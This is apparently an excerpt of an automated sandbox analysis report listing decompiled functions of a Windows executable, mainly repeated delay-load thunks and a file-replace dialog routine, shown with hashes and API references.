Opcode Fuzzy Hash: 5ecd892488d224fda8916b53e1fcfd8c313c670c99eb78e7ddca1b3f4c0e1fc1
Instruction Fuzzy Hash: 17A0029626D5027C7148B192BD1DD7F125CD5D1915360451EB4859904C645859454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAC0, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DAC0() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eae0c7c0b97b4260b88aa21460aee6c6946831fb56a437db25f0d853467f836f
Instruction ID: 7eaada681e2cf09344a51b5c10bbb11698e8ae467681ff21d16a598cd44e068d
Opcode Fuzzy Hash: eae0c7c0b97b4260b88aa21460aee6c6946831fb56a437db25f0d853467f836f
Instruction Fuzzy Hash: C9A001A62AD103BC7108B292BD2ED7F125CC6D5A653608A1EA48A9904CA89899498A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DACA, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DACA() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c36012cab0c08cb561bb4ba408baf0afc4929c1d667be558969452dc10543ba
Instruction ID: 7eaada681e2cf09344a51b5c10bbb11698e8ae467681ff21d16a598cd44e068d
Opcode Fuzzy Hash: 7c36012cab0c08cb561bb4ba408baf0afc4929c1d667be558969452dc10543ba
Instruction Fuzzy Hash: C9A001A62AD103BC7108B292BD2ED7F125CC6D5A653608A1EA48A9904CA89899498A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAE8, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DAE8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 81f9c9acd7dc1ab935b8f9f51d47477806f953aebf7882a85e10fa00f8de3c10
Instruction ID: 7eaada681e2cf09344a51b5c10bbb11698e8ae467681ff21d16a598cd44e068d
Opcode Fuzzy Hash: 81f9c9acd7dc1ab935b8f9f51d47477806f953aebf7882a85e10fa00f8de3c10
Instruction Fuzzy Hash: C9A001A62AD103BC7108B292BD2ED7F125CC6D5A653608A1EA48A9904CA89899498A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAF2, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DAF2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d97687518c44fef6fe1f88e35d301494f3bf62c73082d2946b28991a05b6774a
Instruction ID: 7eaada681e2cf09344a51b5c10bbb11698e8ae467681ff21d16a598cd44e068d
Opcode Fuzzy Hash: d97687518c44fef6fe1f88e35d301494f3bf62c73082d2946b28991a05b6774a
Instruction Fuzzy Hash: C9A001A62AD103BC7108B292BD2ED7F125CC6D5A653608A1EA48A9904CA89899498A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAFC, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DAFC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42027134462bb9abbafcab72dd731bfc9af8413e85f25c63aef6cf395886a647
Instruction ID: 7eaada681e2cf09344a51b5c10bbb11698e8ae467681ff21d16a598cd44e068d
Opcode Fuzzy Hash: 42027134462bb9abbafcab72dd731bfc9af8413e85f25c63aef6cf395886a647
Instruction Fuzzy Hash: C9A001A62AD103BC7108B292BD2ED7F125CC6D5A653608A1EA48A9904CA89899498A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC0B, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DC0B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be44); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dbd0
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6f5d409c31a9687af30b07d5ab95c9618d3a09915efbd463b97f98b1dbe14f81
Instruction ID: 96ae190853a7bfa4491c54ddf5d3ee9f8e7e8da4ecfea41d796b1fdb7c5cdf24
Opcode Fuzzy Hash: 6f5d409c31a9687af30b07d5ab95c9618d3a09915efbd463b97f98b1dbe14f81
Instruction Fuzzy Hash: 2EA011AA2BC003BC3008228A3C0EC3A022CE2C0A20320880EA08A88008A8A80C080230

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC15, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DC15() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be44); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dbd0
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 65f01a037521d6876ac254a5a3274525f48865fb2506d62b4c4359baa3e6e6ba
Instruction ID: 96ae190853a7bfa4491c54ddf5d3ee9f8e7e8da4ecfea41d796b1fdb7c5cdf24
Opcode Fuzzy Hash: 65f01a037521d6876ac254a5a3274525f48865fb2506d62b4c4359baa3e6e6ba
Instruction Fuzzy Hash: 2EA011AA2BC003BC3008228A3C0EC3A022CE2C0A20320880EA08A88008A8A80C080230

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC1F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DC1F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be44); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dbd0
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 21032c2be5d684192edb1bd19610627a402cacb0d33b0076b3088bcd27ebde66
Instruction ID: 96ae190853a7bfa4491c54ddf5d3ee9f8e7e8da4ecfea41d796b1fdb7c5cdf24
Opcode Fuzzy Hash: 21032c2be5d684192edb1bd19610627a402cacb0d33b0076b3088bcd27ebde66
Instruction Fuzzy Hash: 2EA011AA2BC003BC3008228A3C0EC3A022CE2C0A20320880EA08A88008A8A80C080230

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC44, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DC44() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be64); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dc31
0x0101dc36
0x0101dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DC36

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: baf102294ca920c596d38ab936701dba3edf7e63193a31d3986f103e48679998
Instruction ID: 1a41adf921ecb007049462cbae32bffdf9f60e6f97cdf4077dc11355cf3f9d92
Opcode Fuzzy Hash: baf102294ca920c596d38ab936701dba3edf7e63193a31d3986f103e48679998
Instruction Fuzzy Hash: 67A0129616C1037C700C21813C09D3A031CC1D0B103204C0DA0859400454841C040530

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC4E, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DC4E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be64); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dc31
0x0101dc36
0x0101dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DC36

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7d668bb9d1a3befe08a73b27e8118e324c9022a6c799f6fc57cbb37fe1ed9306
Instruction ID: 1a41adf921ecb007049462cbae32bffdf9f60e6f97cdf4077dc11355cf3f9d92
Opcode Fuzzy Hash: 7d668bb9d1a3befe08a73b27e8118e324c9022a6c799f6fc57cbb37fe1ed9306
Instruction Fuzzy Hash: 67A0129616C1037C700C21813C09D3A031CC1D0B103204C0DA0859400454841C040530

Uniqueness

Uniqueness Score: -1.00%

Function 01009EBF, Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01009EBF(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x01009ec2
0x01009ecb
0x01009ece

APIs

SetEndOfFile.KERNELBASE(?,01009104,?,?,-00001964), ref: 01009EC2

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 23486ec52e3d85399141bd5a3c0021c1e0174295b299e5d0f912f7c5a85147cb
Instruction ID: d406307c68b5338763e5269e26f02170210c43680d3951fee3155f1ae51c9210
Opcode Fuzzy Hash: 23486ec52e3d85399141bd5a3c0021c1e0174295b299e5d0f912f7c5a85147cb
Instruction Fuzzy Hash: D3B012300A4005468E102A30C9144147A14F61230630041607042C9054CB17C0025B00

Uniqueness

Uniqueness Score: -1.00%

Function 0101A322, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101A322(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x0101a326
0x0101a32e
0x0101a332

APIs

SetCurrentDirectoryW.KERNELBASE(?,0101A587,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101A326

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 1e8e737b4c9cd967f7af76c9d8fc0f9a45046b372889fbf665298853ebb35180
Instruction ID: 9f1005fd509c80c7127155d79bd7aed399eb60c3fe37af1cc5f02f662c72858a
Opcode Fuzzy Hash: 1e8e737b4c9cd967f7af76c9d8fc0f9a45046b372889fbf665298853ebb35180
Instruction Fuzzy Hash: A8A01230194006568A100B30C809C1576646760703F0086207042C4094CB318814A600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0101B8E0, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0101B8E0(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E0101E360();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E0100130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E0100FE56( &_a2640, _a6752, 0x800);
						E0100BD5B( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0x1062080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E0100400A( &_a900, 0x200, L"%s %s %s", E0100DDD1(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E0101A63C(0 + _a344, _a340,  &_a212, 0x32);
								_push(E0100DDD1(0 + _a344, 0x98));
								_t151 = 0x200;
								E0100400A( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0x1048464; // 0x0
							E01010BDD(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E0100400A( &_a896, _t151, L"%s %s %s", E0100DDD1(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0x105dc8c; // 0x0
							_t158 =  *0x105dc88; // 0x0
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E0101A63C(_t158, _t154,  &_a212, 0x32);
								_push(E0100DDD1(_t154, 0x98));
								E0100400A( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
